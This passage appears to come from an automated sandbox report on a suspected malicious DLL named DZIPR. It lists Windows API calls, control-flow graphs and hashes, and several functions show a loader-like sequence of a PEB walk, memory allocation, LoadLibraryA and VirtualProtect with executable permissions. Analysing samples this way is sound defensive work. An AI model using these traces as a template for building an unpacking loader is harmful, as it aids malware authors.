                                        • GetSystemMetrics.USER32(0000000B), ref: 6C91CD75
                                        • GetSystemMetrics.USER32(0000000C), ref: 6C91CD7C
                                        • GetSystemMetrics.USER32(00000002), ref: 6C91CD83
                                        • GetSystemMetrics.USER32(00000003), ref: 6C91CD8D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: MetricsSystem
                                        • String ID:
                                        • API String ID: 4116985748-0
                                        • Opcode ID: f0a622cc623e56eee8b4709551fe8ac40611e8acdce330551d32b3262544a437
                                        • Instruction ID: 22fff9c0cf626c2dd36a1d92f64354cbb861477ee5037139107c268b98a964e9
                                        • Opcode Fuzzy Hash: f0a622cc623e56eee8b4709551fe8ac40611e8acdce330551d32b3262544a437
                                        • Instruction Fuzzy Hash: 86F049B1F44714BAEB205B728C49B267F78EB42721F208517E6088B280DBB5D8008FD0
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(6C9434A8), ref: 6C91C25A
                                        • RtlInitializeCriticalSection.NTDLL(?), ref: 6C91C26C
                                        • RtlLeaveCriticalSection.NTDLL(6C9434A8), ref: 6C91C279
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 6C91C289
                                          • Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
                                          • Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                        • String ID:
                                        • API String ID: 2895727460-0
                                        • Opcode ID: fffb0fa50e0883b22a0fc766d6e2cc208ae4e21ca83d5be76436636873a3096f
                                        • Instruction ID: 8acb60922003c4203cda900740d2cb2b671499e0d044e7dd57d54f5506d2e104
                                        • Opcode Fuzzy Hash: fffb0fa50e0883b22a0fc766d6e2cc208ae4e21ca83d5be76436636873a3096f
                                        • Instruction Fuzzy Hash: 95F0FC3260C2186FCF102BB5CC86B59777EFBE2329F654927E10483D01CB30D541C5A5
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(6C9432EC), ref: 6C91BA69
                                        • TlsGetValue.KERNEL32(6C9432D0,?,?,?,?,6C91C0B7,?,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?), ref: 6C91BA7D
                                        • RtlLeaveCriticalSection.NTDLL(6C9432EC), ref: 6C91BA93
                                        • RtlLeaveCriticalSection.NTDLL(6C9432EC), ref: 6C91BA9E
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$EnterValue
                                        • String ID:
                                        • API String ID: 3969253408-0
                                        • Opcode ID: 61f58444e44cb756542c2072a90632ca9e0fec787298d40f8ac6e12f327b32c8
                                        • Instruction ID: 886c0db4a512db73ad491b885eeb8d38b4443bc67138d4579c2fa2e2868934b3
                                        • Opcode Fuzzy Hash: 61f58444e44cb756542c2072a90632ca9e0fec787298d40f8ac6e12f327b32c8
                                        • Instruction Fuzzy Hash: F7F030B63082089FDB208F58C889C0AB7FFEB853643254817E65DD3A01D770F9459BE0
                                        APIs
                                        • __getptd.LIBCMT ref: 6C930586
                                          • Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
                                          • Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F
                                        • __getptd.LIBCMT ref: 6C93059D
                                        • __amsg_exit.LIBCMT ref: 6C9305AB
                                        • __lock.LIBCMT ref: 6C9305BB
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                        • String ID:
                                        • API String ID: 3521780317-0
                                        • Opcode ID: f8c48cff244dbfedb15d64d984bbfb506cae295a6a097ea952de61501ede9799
                                        • Instruction ID: 03907378641923197af6959e1484c02178f1db7e93c2ead1fcd33683da656afe
                                        • Opcode Fuzzy Hash: f8c48cff244dbfedb15d64d984bbfb506cae295a6a097ea952de61501ede9799
                                        • Instruction Fuzzy Hash: 6FF09032A15760CBDB20EB69840578D73A06B3072CF51754AE488A7F94CB38E905CB62
                                        APIs
                                        • _memset.LIBCMT ref: 6C92029B
                                        • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6C9202C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: MessageSend_memset
                                        • String ID: ,
                                        • API String ID: 1827994538-3772416878
                                        • Opcode ID: 4e9c873f108f7195f921791e0780f90ea9be8c1980a83bbeeb3ff6a397a7a7c1
                                        • Instruction ID: 02633c6aedf4cdb7bbdbced0f9a80573da31477cc4c4a4d85076081c4d3ad88e
                                        • Opcode Fuzzy Hash: 4e9c873f108f7195f921791e0780f90ea9be8c1980a83bbeeb3ff6a397a7a7c1
                                        • Instruction Fuzzy Hash: 233144306113809FDB109FB5C894A9EBBF8BF58318F21122EE19697F90DB34E808CB44
                                        APIs
                                          • Part of subcall function 6C91A59C: GetModuleHandleW.KERNEL32(KERNEL32,6C91A6B6), ref: 6C91A5AA
                                          • Part of subcall function 6C91A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C91A5CB
                                          • Part of subcall function 6C91A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C91A5DD
                                          • Part of subcall function 6C91A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C91A5EF
                                          • Part of subcall function 6C91A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C91A601
                                        • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C91A6D0
                                        • SetLastError.KERNEL32(0000006F), ref: 6C91A6E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$Module$ErrorFileHandleLastName
                                        • String ID:
                                        • API String ID: 2524245154-3916222277
                                        • Opcode ID: a6ffc472004e2af1f9cbe94a9a46dad01329b6a0ad1caee4f88f11e2e85849f5
                                        • Instruction ID: cb7cc421087a4714eecfc09ec235504de95922053c618d15f78c5e8a9bfc76f2
                                        • Opcode Fuzzy Hash: a6ffc472004e2af1f9cbe94a9a46dad01329b6a0ad1caee4f88f11e2e85849f5
                                        • Instruction Fuzzy Hash: CF217C7090421C9EDB20DF71C8597EEB7B8BF24328F10869AC069D6680DB749B89CF54
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C918E78
                                        • PathFindExtensionW.SHLWAPI(?), ref: 6C918E8E
                                          • Part of subcall function 6C918BDF: __EH_prolog3_GS.LIBCMT ref: 6C918BE9
                                          • Part of subcall function 6C918BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C918EB7,?,?), ref: 6C918C19
                                          • Part of subcall function 6C918BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C918C2D
                                          • Part of subcall function 6C918BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C918C69
                                          • Part of subcall function 6C918BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C918C77
                                          • Part of subcall function 6C918BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C918C94
                                          • Part of subcall function 6C918BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C918CBF
                                          • Part of subcall function 6C918BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C918CC8
                                          • Part of subcall function 6C918BDF: GetModuleFileNameW.KERNEL32(6C910000,?,00000105), ref: 6C918D7F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                        • String ID: %s%s.dll
                                        • API String ID: 1311856149-1649984862
                                        • Opcode ID: 24a449ab601d9aabb0eccd50e6258b05ddc87fd8b3ffa0201adc58189c084d71
                                        • Instruction ID: 562a3db35b6316da1ce9060be42ef977ac4f7975f2794244edaf72ea45afa719
                                        • Opcode Fuzzy Hash: 24a449ab601d9aabb0eccd50e6258b05ddc87fd8b3ffa0201adc58189c084d71
                                        • Instruction Fuzzy Hash: 4701A77161511CABCB15DB68D8459EB73BDFF4A304F110466A405E7500D770DA04CB58
                                        APIs
                                          • Part of subcall function 6C925017: __getptd.LIBCMT ref: 6C92501D
                                          • Part of subcall function 6C925017: __getptd.LIBCMT ref: 6C92502D
                                        • __getptd.LIBCMT ref: 6C92C54B
                                          • Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
                                          • Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F
                                        • __getptd.LIBCMT ref: 6C92C559
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: csm
                                        • API String ID: 803148776-1018135373
                                        • Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                                        • Instruction ID: fb3308d7053697f8904feab21db7bf495dd3287e29de72db3908106fdcd2ee5b
                                        • Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                                        • Instruction Fuzzy Hash: 2A01A271829201CBEF24AF61C840A9DBFB9AF20218F64451ED4C0A6E5CCF38C984CF41

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 25 6fea63f0-6fea63f8 26 6fea63fe-6fea640f 25->26 27 6fea649c-6fea64c1 25->27 28 6fea6413-6fea641e 26->28 29 6fea64c3 27->29 30 6fea6524 27->30 32 6fea6420 28->32 33 6fea6481 28->33 31 6fea64c5-6fea64cb 29->31 34 6fea6526-6fea6551 30->34 31->31 35 6fea64cd-6fea64cf 31->35 36 6fea6422-6fea6427 32->36 37 6fea6483-6fea6487 33->37 38 6fea65f1 34->38 39 6fea6557-6fea6568 34->39 35->30 41 6fea64d1-6fea64d7 35->41 36->36 42 6fea6429-6fea642b 36->42 43 6fea671b-6fea671e 37->43 44 6fea648d-6fea6492 37->44 45 6fea65f3-6fea6661 LoadLibraryA VirtualProtect call 6fea67f8 VirtualProtect 38->45 40 6fea656c-6fea6577 39->40 46 6fea65da 40->46 47 6fea6579 40->47 48 6fea64dd-6fea64e6 41->48 49 6fea66f0 41->49 42->33 50 6fea642d-6fea6433 42->50 44->28 51 6fea6498 44->51 64 6fea6682-6fea66a9 45->64 65 6fea6663 45->65 54 6fea65dc-6fea65e0 46->54 53 6fea657b-6fea6580 47->53 55 6fea64ea-6fea6501 48->55 56 6fea6439-6fea6443 50->56 57 6fea66e6 50->57 51->27 53->53 59 6fea6582-6fea6584 53->59 61 6fea65e6-6fea65eb 54->61 62 6fea6704-6fea6716 54->62 55->55 63 6fea6503-6fea6513 55->63 60 6fea6447-6fea645e 56->60 70 6fea66fa 57->70 59->46 67 6fea6586-6fea658c 59->67 60->60 68 6fea6460-6fea6471 60->68 61->38 61->40 62->45 63->34 69 6fea6515-6fea6522 63->69 66 6fea6667-6fea6680 65->66 66->64 66->66 67->70 72 6fea6592-6fea659c 67->72 68->37 73 6fea6473-6fea647f 68->73 69->34 70->62 74 6fea65a0-6fea65b7 72->74 73->37 74->74 75 6fea65b9-6fea65ca 74->75 75->54 76 6fea65cc-6fea65d8 75->76 76->54
                                        APIs
                                        • LoadLibraryA.KERNELBASE(00000000), ref: 6FEA6602
                                        • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FEA663B
                                        • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FEA6654
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$LibraryLoad
                                        • String ID:
                                        • API String ID: 895956442-0
                                        • Opcode ID: 77737e6700965e20c40b6cbdc73dff0e1501477899c3e6bd9ddb3303b2241935
                                        • Instruction ID: 8dfcc0ad697abc4ce467b2ef11547946d5404f8d6a45d222ce4ad250fbb139e3
                                        • Opcode Fuzzy Hash: 77737e6700965e20c40b6cbdc73dff0e1501477899c3e6bd9ddb3303b2241935
                                        • Instruction Fuzzy Hash: 70A1AB305087558FC315CF6CC48066AFBE2BFCA308F19896EE8959B356D632E9558B81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 105 6fea5ca0-6fea5d95 call 6feaaf9c * 2 call 6feaafc3 * 2 call 6fea64e0 GetPEB 116 6fea5d97 105->116 117 6fea5de4 105->117 118 6fea5d99-6fea5da3 116->118 119 6fea5de6-6fea5e1d 117->119 120 6fea5dd6-6fea5dd8 118->120 121 6fea5da5-6fea5dab 118->121 122 6fea5eba-6fea5f0c GlobalAlloc 119->122 123 6fea5e23-6fea5e3c 119->123 127 6fea5dde-6fea5de2 120->127 128 6fea67e1-6fea67e4 120->128 124 6fea5dae-6fea5db5 121->124 125 6fea5fad 122->125 126 6fea5f12-6fea5f2b 122->126 129 6fea5e40-6fea5e4e 123->129 130 6fea5dc1-6fea5dcd 124->130 131 6fea5db7-6fea5dbd 124->131 132 6fea5faf-6fea5fce 125->132 133 6fea5f2f-6fea5f3d 126->133 127->117 127->118 128->119 134 6fea5ea3 129->134 135 6fea5e50 129->135 130->124 139 6fea5dcf-6fea5dd3 130->139 131->130 137 6fea5dbf 131->137 147 6fea5fd0 132->147 148 6fea5fe7-6fea5fea 132->148 140 6fea5f3f 133->140 141 6fea5f92 133->141 136 6fea5ea5-6fea5ea9 134->136 142 6fea5e52-6fea5e58 135->142 143 6fea5eaf-6fea5eb4 136->143 144 6fea67c3-6fea67d8 136->144 137->130 139->120 145 6fea5f41-6fea5f47 140->145 149 6fea5f94-6fea5f98 141->149 142->142 146 6fea5e5a-6fea5e5c 142->146 143->129 153 6fea5eb6 143->153 145->145 154 6fea5f49-6fea5f4b 145->154 146->134 155 6fea5e5e-6fea5e64 146->155 156 6fea5fd2-6fea5fe5 147->156 157 6fea5ffe-6fea6038 148->157 158 6fea5fec 148->158 151 6fea5f9e-6fea5fa3 149->151 152 6fea67a5-6fea67be 149->152 151->133 159 6fea5fa5-6fea5fa9 151->159 152->132 153->122 154->141 160 6fea5f4d-6fea5f53 154->160 161 6fea66aa-6fea66af 155->161 162 6fea5e6a-6fea5e6e 155->162 156->148 156->156 164 6fea60d9 157->164 165 6fea603e-6fea6057 157->165 163 6fea5fee-6fea5ffc 158->163 159->125 168 6fea5f59-6fea5f5d 160->168 169 6fea66b4 160->169 167 6fea5e90-6fea5e95 161->167 170 6fea5e70-6fea5e86 162->170 163->157 163->163 171 6fea60db-6fea60ef 164->171 166 6fea605b-6fea6069 165->166 172 6fea606b 166->172 173 6fea60be 166->173 167->136 176 6fea5e97-6fea5ea1 167->176 174 6fea5f5f-6fea5f75 168->174 179 6fea66be 169->179 170->170 175 6fea5e88-6fea5e8c 170->175 177 6fea606d-6fea6073 172->177 178 6fea60c0-6fea60c4 173->178 174->174 180 6fea5f77-6fea5f84 174->180 175->167 176->136 177->177 181 6fea6075-6fea6077 177->181 182 6fea60ca-6fea60cf 178->182 183 6fea6788-6fea67a0 178->183 179->183 180->149 184 6fea5f86-6fea5f90 180->184 181->173 185 6fea6079-6fea607f 181->185 182->166 186 6fea60d1-6fea60d5 182->186 183->171 184->149 185->179 187 6fea6085-6fea6089 185->187 186->164 188 6fea608b-6fea60a1 187->188 188->188 189 6fea60a3-6fea60b0 188->189 189->178 190 6fea60b2-6fea60bc 189->190 190->178
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: LibraryLoad_memset
                                        • String ID:
                                        • API String ID: 2997193564-0
                                        • Opcode ID: 8348686e6431dbc6a901d9eb7c30cf0457994e75fe240a2e6d2566047d7036bf
                                        • Instruction ID: 8e5e68a5b424ec8e66d1b671fa73c87357aebb0f963e0851272bb67f7d6a7dd3
                                        • Opcode Fuzzy Hash: 8348686e6431dbc6a901d9eb7c30cf0457994e75fe240a2e6d2566047d7036bf
                                        • Instruction Fuzzy Hash: AEE16DB49087058FC714CF69C49062AFBE5FF8A318F65892EE8998B351D731B855CF81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 351 6fea5e70-6fea5e86 351->351 352 6fea5e88-6fea5e8c 351->352 353 6fea5e90-6fea5e95 352->353 354 6fea5e97-6fea5ea1 353->354 355 6fea5ea5-6fea5ea9 353->355 354->355 356 6fea5eaf-6fea5eb4 355->356 357 6fea67c3-6fea67d8 355->357 359 6fea5e40-6fea5e4e 356->359 360 6fea5eb6-6fea5f0c GlobalAlloc 356->360 362 6fea5ea3 359->362 363 6fea5e50 359->363 364 6fea5fad 360->364 365 6fea5f12-6fea5f2b 360->365 362->355 366 6fea5e52-6fea5e58 363->366 367 6fea5faf-6fea5fce 364->367 368 6fea5f2f-6fea5f3d 365->368 366->366 369 6fea5e5a-6fea5e5c 366->369 375 6fea5fd0 367->375 376 6fea5fe7-6fea5fea 367->376 371 6fea5f3f 368->371 372 6fea5f92 368->372 369->362 373 6fea5e5e-6fea5e64 369->373 374 6fea5f41-6fea5f47 371->374 379 6fea5f94-6fea5f98 372->379 377 6fea66aa-6fea66af 373->377 378 6fea5e6a-6fea5e6e 373->378 374->374 382 6fea5f49-6fea5f4b 374->382 383 6fea5fd2-6fea5fe5 375->383 384 6fea5ffe-6fea6038 376->384 385 6fea5fec 376->385 377->353 378->351 380 6fea5f9e-6fea5fa3 379->380 381 6fea67a5-6fea67be 379->381 380->368 386 6fea5fa5-6fea5fa9 380->386 381->367 382->372 387 6fea5f4d-6fea5f53 382->387 383->376 383->383 389 6fea60d9 384->389 390 6fea603e-6fea6057 384->390 388 6fea5fee-6fea5ffc 385->388 386->364 392 6fea5f59-6fea5f5d 387->392 393 6fea66b4 387->393 388->384 388->388 394 6fea60db-6fea60ef 389->394 391 6fea605b-6fea6069 390->391 395 6fea606b 391->395 396 6fea60be 391->396 397 6fea5f5f-6fea5f75 392->397 400 6fea66be 393->400 398 6fea606d-6fea6073 395->398 399 6fea60c0-6fea60c4 396->399 397->397 401 6fea5f77-6fea5f84 397->401 398->398 402 6fea6075-6fea6077 398->402 403 6fea60ca-6fea60cf 399->403 404 6fea6788-6fea67a0 399->404 400->404 401->379 405 6fea5f86-6fea5f90 401->405 402->396 406 6fea6079-6fea607f 402->406 403->391 407 6fea60d1-6fea60d5 403->407 404->394 405->379 406->400 408 6fea6085-6fea6089 406->408 407->389 409 6fea608b-6fea60a1 408->409 409->409 410 6fea60a3-6fea60b0 409->410 410->399 411 6fea60b2-6fea60bc 410->411 411->399
                                        APIs
                                        • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FEA5ECA
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AllocGlobal
                                        • String ID:
                                        • API String ID: 3761449716-0
                                        • Opcode ID: 0802392e6cea054864f0b4cb64cffbb3c3fa306c57a1c74609391f981a39b17b
                                        • Instruction ID: 73f21e50b105959a464de6716583fb5657096b0e1874c20bc492bcc2a1c0a857
                                        • Opcode Fuzzy Hash: 0802392e6cea054864f0b4cb64cffbb3c3fa306c57a1c74609391f981a39b17b
                                        • Instruction Fuzzy Hash: DBA194746083068FC718CF2CC59062AFBE2BF8A308F24856DE8968B355D771F965CB81

                                        Control-flow Graph

                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(6FED32EC), ref: 6FEABC61
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6FED32D0,6FED32D0,?,6FEAC0A4,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?), ref: 6FEABCB7
                                        • GlobalHandle.KERNEL32(00D1D320), ref: 6FEABCC0
                                        • GlobalUnlock.KERNEL32(00000000), ref: 6FEABCCA
                                        • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6FEABCE3
                                        • GlobalHandle.KERNEL32(00D1D320), ref: 6FEABCF5
                                        • GlobalLock.KERNEL32(00000000), ref: 6FEABCFC
                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FEABD05
                                        • GlobalLock.KERNEL32(00000000), ref: 6FEABD11
                                        • _memset.LIBCMT ref: 6FEABD2B
                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FEABD59
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                        • String ID:
                                        • API String ID: 496899490-0
                                        • Opcode ID: f5be7fda8bac3929cf39035014df62524f8441d1da511f1efcc03a696f86fbe5
                                        • Instruction ID: d687d403ae56fe9b0a9cbccbdaa45fe611f5612c7f8ec7616da095ade2572349
                                        • Opcode Fuzzy Hash: f5be7fda8bac3929cf39035014df62524f8441d1da511f1efcc03a696f86fbe5
                                        • Instruction Fuzzy Hash: B931A071A04B04AFDB208F64C949E4A7FF9EF82314B21496EE562DB250DB32F940CB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
